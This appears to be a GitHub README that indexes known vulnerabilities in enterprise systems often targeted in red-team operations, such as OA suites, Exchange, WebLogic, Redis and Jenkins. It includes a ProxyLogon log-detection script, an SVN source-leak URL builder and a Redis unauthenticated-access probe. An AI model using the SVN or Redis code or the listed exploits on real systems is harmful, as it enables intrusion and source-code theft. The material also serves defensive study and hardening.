r0eXpeR / Redteam_vul
A curated list of vulnerabilities in the key systems most often encountered in red team operations.
Stars: ✭ 1,271
Vulnerabilities in key systems that are easy targets in red team operations
The dates below are update dates, not vulnerability discovery dates. Entries marked ⚒️ link to tools.
Works best together with EHole (棱洞), a fingerprinting tool for red-team priority targets: https://github.com/EdgeSecurityTeam/EHole
This project is mirrored at: https://forum.ywhack.com/bountytips.php?Vulnerability
1. OA systems
Weaver (泛微, Weaver-Ecology-OA)
- [2021.01.07] - Weaver OA E-cology RCE (CNVD-2019-32204) - affects versions 7.0/8.0/8.1/9.0
- [2021.01.07] - Weaver OA WorkflowCenterTreeData interface SQL injection (Oracle back ends only)
- [2021.01.07] - Weaver ecology OA database configuration information disclosure
- [2021.01.07] - Weaver OA Yunqiao (云桥) arbitrary file read - affects multiple 2018-2019 versions
- [2021.01.07] - Weaver e-cology OA pre-auth SQL injection
- [2021.01.07] - Weaver OA com.eweaver.base.security.servlet.LoginAction keywordid parameter SQL injection
- [2021.01.07] - Weaver OA sysinterface/codeEdit.jsp arbitrary file upload
Seeyon (致远)
- [2021.01.07] - Seeyon OA A8 htmlofficeservlet getshell
- [2021.01.07] - Seeyon OA session leak
- [2021.01.07] - Seeyon OA A6 search_result.jsp SQL injection
- [2021.01.07] - Seeyon OA A6 setextno.jsp SQL injection
- [2021.01.07] - Seeyon OA A6 database account password reset
- [2021.01.07] - Seeyon OA A8 unauthorized access
- [2021.01.07] - Seeyon OA A8-v5 arbitrary user password change
- [2021.01.07] - Seeyon OA A8-m backend universal password (login bypass)
- [2021.01.07] - Seeyon OA FanRuan FineReport (帆软报表) component pre-auth XXE
- [2021.01.07] - Seeyon OA FanRuan FineReport component reflected XSS & SSRF - Thanks: @LandGrey
Landray OA (蓝凌)
- [2021.01.07] - None yet (contributions welcome)
Tongda OA (通达, TongDa OA)
- [2021.01.07] - Tongda OA arbitrary file deletion & file upload RCE analysis (0day from the August 2020 HW/HVV exercise)
- [2021.01.07] - Tongda OA arbitrary file upload / file inclusion getshell
- [2021.01.07] - Tongda OA < 11.5 arbitrary user login
- [2021.01.07] - Tongda OA 11.2 authenticated (backend) getshell
- [2021.01.07] - Tongda OA 11.7 authenticated SQL injection to getshell
- [2021.03.06] - Tongda OA 11.7 unauthenticated RCE
- [2021.03.09] - Tongda OA 11.8 low-privilege authenticated getshell
- [2021.03.07] - ⚒️TDOA_RCE Tongda OA all-in-one exploitation tool
Kingdee OA (金蝶)
- [2021.01.07] - Kingdee collaborative office system getshell
2. E-mail
Exchange
- [2021.01.07] - CVE-2020-17083 Microsoft Exchange Server remote code execution
- [2021.01.07] - Microsoft Exchange remote code execution (CVE-2020-16875)
- [2021.01.07] - CVE-2020-0688 Microsoft Exchange remote code execution
- [2021.01.07] - Microsoft Exchange arbitrary user impersonation
- [2021.03.08] - ⚒️Microsoft Exchange SSRF (CVE-2021-26855)
- [2021.01.07] - Exchange historical vulnerability collection
- [2021.03.10] - Microsoft Exchange ProxyLogon exploit chain
Coremail
- [2021.01.07] - Coremail configuration information disclosure and unauthenticated interface access
- [2021.01.07] - Coremail stored XSS
- [2021.01.07] - Coremail historical vulnerability collection
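The Exchange entries above are exploit references; the check a defender wants for the CVE-2021-26855 SSRF that opens the ProxyLogon chain is the one Microsoft published for the Exchange HttpProxy logs: a request with an empty AuthenticatedUser whose AnchorMailbox matches `ServerInfo~*/*`. The following is an added example, not code from this project or the linked tools. It assumes the HttpProxy log is comma-separated, with `#`-prefixed preamble lines and the column list either in a `#Fields:` line or a plain header row, and that the `AuthenticatedUser`, `AnchorMailbox`, `ClientIpAddress` and `UrlStem` columns are present; the embedded sample log is constructed and keeps only those columns.

```python
"""Hunt Exchange HttpProxy logs for the CVE-2021-26855 (ProxyLogon) SSRF
indicator: an unauthenticated request whose AnchorMailbox is a
'ServerInfo~<backend>/<path>' routing anchor instead of a mailbox or SID.
Added example, not from the Redteam_vul project. Assumption: the log is
comma-separated with a '#' preamble and a '#Fields:' line or plain header
row; only the columns used here are mirrored in the constructed sample.
"""
import csv
import io
from collections import defaultdict
from typing import Dict, Iterator, List

# Constructed sample (not real telemetry). Rows 1 and 3 are pre-auth requests
# to static-looking OWA/ECP paths anchored to a back-end URL, the SSRF shape.
# Row 2 is a normal authenticated OWA request anchored to a SID. Row 4 has a
# ServerInfo anchor but an authenticated user, so the rule must not fire.
SAMPLE_LOG = """\
#Software: Microsoft Exchange Server
#Log-type: HttpProxy Logs
#Fields: DateTime,ClientIpAddress,UrlStem,AuthenticatedUser,AnchorMailbox
2021-03-03T01:12:44.123Z,203.0.113.10,/owa/auth/x.js,,ServerInfo~a]@EXCH01.corp.example:444/ecp/proxyLogon.ecp?a=~1942062522
2021-03-03T01:13:01.456Z,198.51.100.7,/owa/,CORP\\alice,Sid~S-1-5-21-1004336348-1177238915-682003330-1112
2021-03-03T01:13:09.789Z,203.0.113.10,/ecp/y.js,,ServerInfo~EXCH01.corp.example:444/autodiscover/autodiscover.xml?#
2021-03-03T01:14:20.000Z,198.51.100.9,/mapi/emsmdb/,CORP\\bob,ServerInfo~EXCH01.corp.example:444/mapi/emsmdb/?MailboxId=0b2f8ad9-2e0d-4d58-9f1c-3a9b6c4d5e6f@corp.example
"""


def read_httpproxy_log(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per request row. '#' lines are the Exchange log
    preamble; a '#Fields:' line supplies the column names when present,
    otherwise the first non-comment line is taken as the header row."""
    fields: List[str] = []
    rows: List[str] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = [f.strip() for f in line[len("#Fields:"):].split(",")]
            continue
        rows.append(line)
    if not fields:
        if not rows:
            return
        fields = [f.strip() for f in rows.pop(0).split(",")]
    yield from csv.DictReader(io.StringIO("\n".join(rows)), fieldnames=fields)


def is_proxylogon_ssrf(row: Dict[str, str]) -> bool:
    """Microsoft's published indicator: AuthenticatedUser empty and
    AnchorMailbox like ServerInfo~*/* (a slash after the ServerInfo~ prefix)."""
    user = (row.get("AuthenticatedUser") or "").strip()
    anchor = row.get("AnchorMailbox") or ""
    prefix = "ServerInfo~"
    return user == "" and anchor.startswith(prefix) and "/" in anchor[len(prefix):]


def find_hits(log_text: str) -> List[Dict[str, str]]:
    return [row for row in read_httpproxy_log(log_text) if is_proxylogon_ssrf(row)]


def hits_by_client(hits: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group hit URL stems by source IP for triage."""
    grouped: Dict[str, List[str]] = defaultdict(list)
    for row in hits:
        grouped[row.get("ClientIpAddress", "?")].append(row.get("UrlStem", ""))
    return dict(grouped)


if __name__ == "__main__":
    for ip, stems in hits_by_client(find_hits(SAMPLE_LOG)).items():
        print(f"{ip}: {len(stems)} suspicious pre-auth request(s): {stems}")
```

Point `find_hits` at the contents of each file under `%ExchangeInstallPath%\Logging\HttpProxy\` (all subdirectories); a hit is a lead, not proof of compromise, so follow up with the web shell and ECP/OAB checks that the rest of the ProxyLogon chain leaves behind.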
3. Web middleware
Apache
- [2021.01.07] - Apache Solr RCE (CVE-2019-0192)
- [2021.01.07] - CVE-2018-1335: Apache Tika command injection
- [2021.01.07] - Apache Axis1 (<= 1.4) RCE
- [2021.01.07] - Tomcat information disclosure and remote code execution (CVE-2017-12615/CVE-2017-12616)
- [2021.01.07] - Tomcat Ghostcat - AJP protocol file read / file inclusion (CVE-2020-1938)
- [2021.01.07] - Tomcat CGI Servlet command execution CVE-2019-0232 (Windows, requires enableCmdLineArguments)
- [2021.01.07] - Tomcat manager WAR deployment getshell
- [2021.01.07] - CVE-2016-1240 Tomcat local privilege escalation
- [2021.01.07] - Tomcat historical vulnerability collection
WebLogic
- [2021.01.07] - CVE-2020-14882 WebLogic authentication bypass RCE
- [2021.01.07] - WebLogic remote command execution analysis (CVE-2019-2725)
- [2021.01.07] - CVE-2019-2618 arbitrary file upload
- [2021.01.07] - WebLogic XMLDecoder deserialization (CVE-2017-10271)
- [2021.01.07] - WebLogic arbitrary file read (CVE-2019-2615) and file upload (CVE-2019-2618)
- [2021.01.07] - WebLogic Coherence component IIOP deserialization (CVE-2020-14644)
- [2021.03.07] - WebLogic CVE-2020-14756 T3/IIOP deserialization RCE
- [2021.03.07] - WebLogic Server remote code execution (CVE-2021-2109)
- [2021.01.07] - WebLogic historical vulnerability collection
- [2021.03.09] - ⚒️WeblogicScan one-click WebLogic vulnerability scanner
JBoss
- [2021.01.07] - CVE-2017-7504 JBoss JMXInvokerServlet deserialization (note: CVE-2017-7504 is the JBossMQ JMS HTTPServerILServlet issue; the classic JMXInvokerServlet deserialization is CVE-2015-7501)
- [2021.01.07] - JBoss 5.x/6.x deserialization (CVE-2017-12149)
- [2021.01.07] - JBoss 4.x JBossMQ JMS deserialization (CVE-2017-7504)
- [2021.01.07] - JBoss remote code execution
- [2021.01.07] - JBoss JMX Console unauthorized access getshell
- [2021.01.07] - JBoss historical vulnerability collection
- [2021.03.10] - ⚒️JbossScan a simple JBoss vulnerability probing tool
4. Source code management
GitLab
- [2021.01.07] - GitLab arbitrary file read CVE-2020-10977
- [2021.01.07] - GitLab remote code execution (CVE-2018-14364)
- [2021.01.07] - GitLab arbitrary file read (CVE-2016-9086) and arbitrary user token leak
- [2021.01.07] - GitLab historical vulnerability collection
SVN
- [2021.01.07] - SVN source code leak (exposed .svn directory under the web root)
- [2021.03.09] - ⚒️svnExploit dumps source from SVN source leaks across all SVN versions
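What the SVN source-leak tooling actually does, for working copies created by SVN 1.7 or later, is fetch `.svn/wc.db` (a SQLite database) from the web root, read the `NODES` table, and turn each file's `checksum` into the path of its pristine copy under `.svn/pristine/`, which the server will happily serve as a static file. The following is an added example, not code from this project or from svnExploit; it builds a constructed in-memory stand-in for `wc.db` that mirrors only the three `NODES` columns used (real databases have many more columns and tables), so it runs offline.

```python
"""Derive fetchable pristine-file paths from a leaked SVN 1.7+ .svn/wc.db.
Added example, not from the Redteam_vul project or svnExploit. The sample
database is constructed and mirrors only the NODES columns used here.
"""
import sqlite3
from typing import List, Tuple

SHA1_PREFIX = "$sha1$"


def pristine_path(checksum: str) -> str:
    """Map a NODES.checksum value ('$sha1$' + 40 hex chars) to the relative
    path of the pristine copy: .svn/pristine/<first two hex>/<sha1>.svn-base"""
    if not checksum.startswith(SHA1_PREFIX) or len(checksum) != len(SHA1_PREFIX) + 40:
        raise ValueError(f"unexpected checksum format: {checksum!r}")
    digest = checksum[len(SHA1_PREFIX):]
    return f".svn/pristine/{digest[:2]}/{digest}.svn-base"


def list_leaked_files(conn: sqlite3.Connection) -> List[Tuple[str, str]]:
    """Return (working-copy path, pristine path) for every versioned file."""
    rows = conn.execute(
        "SELECT local_relpath, checksum FROM NODES "
        "WHERE kind = 'file' AND checksum IS NOT NULL ORDER BY local_relpath"
    )
    return [(relpath, pristine_path(checksum)) for relpath, checksum in rows]


def leak_urls(base_url: str, conn: sqlite3.Connection) -> List[str]:
    """URLs to request from the exposed site, one per pristine file."""
    base = base_url.rstrip("/")
    return [f"{base}/{pristine}" for _, pristine in list_leaked_files(conn)]


def build_sample_wcdb() -> sqlite3.Connection:
    """Constructed stand-in for a real wc.db (assumption: real files carry
    many more columns; only local_relpath, kind and checksum are mirrored).
    Directories have no checksum, files carry '$sha1$<hex>'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE NODES (local_relpath TEXT, kind TEXT, checksum TEXT)")
    conn.executemany("INSERT INTO NODES VALUES (?, ?, ?)", [
        ("", "dir", None),
        ("config", "dir", None),
        ("config/database.php", "file", SHA1_PREFIX + "da39a3ee5e6b4b0d3255bfef95601890afd80709"),
        ("index.php", "file", SHA1_PREFIX + "2fd4e1c67a2d28fced849ee1bb76e7391b93eb12"),
    ])
    return conn


if __name__ == "__main__":
    db = build_sample_wcdb()
    for relpath, pristine in list_leaked_files(db):
        print(f"{relpath:24s} <- {pristine}")
    print(leak_urls("http://target.example/", db))
```

The first request in a real engagement is therefore `GET /.svn/wc.db`; if it returns a SQLite file, save it and feed the connection to `list_leaked_files`. Pre-1.7 working copies have no `wc.db`: they expose `.svn/entries` and keep pristine copies at `.svn/text-base/<name>.svn-base` next to each directory. On the defensive side the fix is the same either way: deploy from an export rather than a checkout, or deny `.svn` (and `.git`) in the web server configuration.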
5. Project management systems
ZenTao (禅道)
- [2021.01.07] - [Component attack chain] ZenTao project management system (ZenTaoPMS) high-risk vulnerability analysis and exploitation
- [2021.01.07] - CNVD-C-2020-121325 ZenTao open-source edition file upload
- [2021.01.07] - ZenTao 9.1.2 unauthenticated SQL injection
- [2021.01.07] - ZenTao <= 12.4.2 backend admin getshell
- [2021.01.07] - ZenTao 9.1.2 access control logic flaw
- [2021.01.07] - ZenTao version 826 getshell under certain conditions
- [2021.01.07] - ZenTao remote code execution
- [2021.01.07] - ZenTao 11.6 arbitrary file read
Jira
- [2021.01.07] - Atlassian Jira vulnerability grab bag
- [2021.01.07] - Jira Service Desk path traversal leading to sensitive information disclosure (CVE-2019-14994)
- [2021.01.07] - Jira unauthenticated SSRF (CVE-2019-8451)
- [2021.01.07] - Atlassian Jira server-side template injection (CVE-2019-11581)
- [2021.01.07] - CVE-2019-8449 Jira information disclosure
- [2021.01.07] - ⚒️CVEs worth trying when you encounter Jira
- [2021.01.07] - Jira historical vulnerability collection
6. Databases
- [2021.03.09] - ⚒️MDAT attack and exploitation tool for several mainstream databases
Redis
- [2021.01.07] - Redis unauthorized access exploitation summary
- [2021.01.07] - Redis 4.x RCE
- [2021.01.07] - Redis exploitation techniques collection
- [2021.01.07] - Redis historical vulnerability collection
- [2021.03.08] - ⚒️Writing files without corruption via Redis master-slave replication
MySQL
- [2021.01.07] - MySQL privilege escalation (CVE-2016-6663 and CVE-2016-6664 chained in practice)
- [2021.01.07] - MySQL penetration and exploitation summary
- [2021.01.07] - MySQL injection collection
- [2021.01.07] - UDF privilege escalation on newer MySQL versions
- [2021.03.08] - MySQL historical vulnerability collection
MSSQL
- [2021.01.07] - MSSQL exploitation techniques (fairly comprehensive)
- [2021.01.07] - MSSQL command execution summary
- [2021.01.07] - Privilege escalation via MSSQL login impersonation
- [2021.01.07] - Advanced MSSQL injection techniques
- [2021.03.08] - Executing commands with MSSQL CLR assemblies
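Every Redis technique listed above, from the classic `CONFIG SET dir`/`dbfilename` file write to the replication-based file drop and the 4.x module-load RCE, starts from the same precondition: the instance answers commands without `AUTH` and still exposes `CONFIG`. The following is an added example, not code from this project or the tools it links, that speaks enough of the RESP wire protocol to send `CONFIG GET dir` and classify the reply. The `probe()` function is the only part that touches the network; the three sample replies are constructed to stand in for an open instance, one with `requirepass`, and one where `CONFIG` has been renamed away.

```python
"""Minimal RESP (Redis wire protocol) encoder/decoder plus a classifier for
the reply to CONFIG GET dir, the probe that tells an unauthenticated Redis
apart from one that needs AUTH or has CONFIG disabled via rename-command.
Added example, not code from the Redteam_vul project or any linked tool.
"""
import socket
from typing import Any, List, Tuple


class RedisError(Exception):
    """A RESP error reply (a line starting with '-')."""


def encode_command(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings:
    '*<argc>\\r\\n' then '$<len>\\r\\n<arg>\\r\\n' for each argument."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg.encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def _read_line(buf: bytes, pos: int) -> Tuple[bytes, int]:
    end = buf.index(b"\r\n", pos)
    return buf[pos:end], end + 2


def _decode(buf: bytes, pos: int) -> Tuple[Any, int]:
    """Decode one RESP value at buf[pos]; return (value, position after it)."""
    kind = buf[pos:pos + 1]
    line, pos = _read_line(buf, pos + 1)
    if kind == b"+":                      # simple string
        return line.decode(), pos
    if kind == b"-":                      # error
        return RedisError(line.decode()), pos
    if kind == b":":                      # integer
        return int(line), pos
    if kind == b"$":                      # bulk string ($-1 is null)
        n = int(line)
        if n < 0:
            return None, pos
        return buf[pos:pos + n].decode(errors="replace"), pos + n + 2
    if kind == b"*":                      # array of nested values
        items: List[Any] = []
        for _ in range(int(line)):
            item, pos = _decode(buf, pos)
            items.append(item)
        return items, pos
    raise ValueError(f"unknown RESP type prefix {kind!r}")


def decode_reply(buf: bytes) -> Any:
    value, _ = _decode(buf, 0)
    return value


def classify_config_reply(reply: bytes) -> str:
    """Interpret the reply to CONFIG GET dir.
    'open'            no AUTH needed and CONFIG works: precondition for the
                      dir/dbfilename write and the replication file drop
    'auth-required'   requirepass is set (NOAUTH error)
    'config-disabled' CONFIG renamed or disabled (unknown command error)
    'error'/'unexpected' anything else, e.g. a protected-mode DENIED reply"""
    value = decode_reply(reply)
    if isinstance(value, RedisError):
        msg = str(value)
        if msg.startswith("NOAUTH"):
            return "auth-required"
        if msg.startswith("ERR unknown command"):
            return "config-disabled"
        return "error"
    if isinstance(value, list) and len(value) == 2 and value[0] == "dir":
        return "open"
    return "unexpected"


def probe(host: str, port: int = 6379, timeout: float = 3.0) -> str:
    """Live probe (not exercised offline): send CONFIG GET dir, classify."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(encode_command("CONFIG", "GET", "dir"))
        return classify_config_reply(sock.recv(4096))


# Constructed replies standing in for three real-world server behaviours.
SAMPLE_REPLIES = {
    "open": b"*2\r\n$3\r\ndir\r\n$5\r\n/root\r\n",
    "noauth": b"-NOAUTH Authentication required.\r\n",
    "renamed": b"-ERR unknown command `CONFIG`, with args beginning with: `GET`, `dir`, \r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLE_REPLIES.items():
        print(f"{name:8s} -> {classify_config_reply(raw)}")
```

An `open` result with `dir` pointing somewhere like `/root` or a web root is the situation the file-write techniques exploit; a Redis 3.2+ instance bound to a non-loopback address without `requirepass` will instead answer `-DENIED ...` in protected mode, which this classifier reports as `error` and which is not exploitable over the network. Hardening is the inverse of the probe: set `requirepass`, bind to loopback or a private interface, and `rename-command CONFIG ""` (and the same for `SLAVEOF`/`REPLICAOF`, `MODULE` and `DEBUG`).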
7. Open-source operations monitoring
Jenkins
- [2021.03.10] - Jenkins path traversal arbitrary file write (CVE-2019-10352)
- [2021.03.10] - Jenkins Git client plugin command execution (CVE-2019-10392)
- [2021.03.10] - Jenkins historical exploit collection
Zabbix
- [2021.03.10] - CVE-2020-11800 Zabbix remote code execution
- [2021.03.10] - CSRF to RCE in Zabbix (CVE-2021-27927)
- [2021.03.10] - Zabbix 2.2 - 3.0.3 remote code execution
- [2021.03.10] - Zabbix Agent 3.0.1 mysql.size shell command injection (CVE-2016-4338)
- [2021.03.10] - Zabbix historical exploit collection
Nagios
- [2021.03.10] - Nagios XI 5.6.9 remote code execution (CVE-2019-20197)
- [2021.03.10] - Nagios XI 5.7.5 multiple vulnerabilities (CVE-2021-25296 to CVE-2021-25299)
- [2021.03.10] - Nagios code injection (CVE-2021-3273)
- [2021.03.10] - Nagios XI 5.5.10: XSS to RCE
- [2021.03.10] - Nagios historical exploit collection
8. Bastion hosts (jump servers)
JumpServer
- [2021.03.10] - JumpServer remote code execution (2021.01)
Qizhi bastion host (齐治堡垒机)
- [2021.03.10] - Qizhi bastion host unauthenticated RCE
- [2021.03.10] - Qizhi bastion host remote code execution
This project is updated from time to time.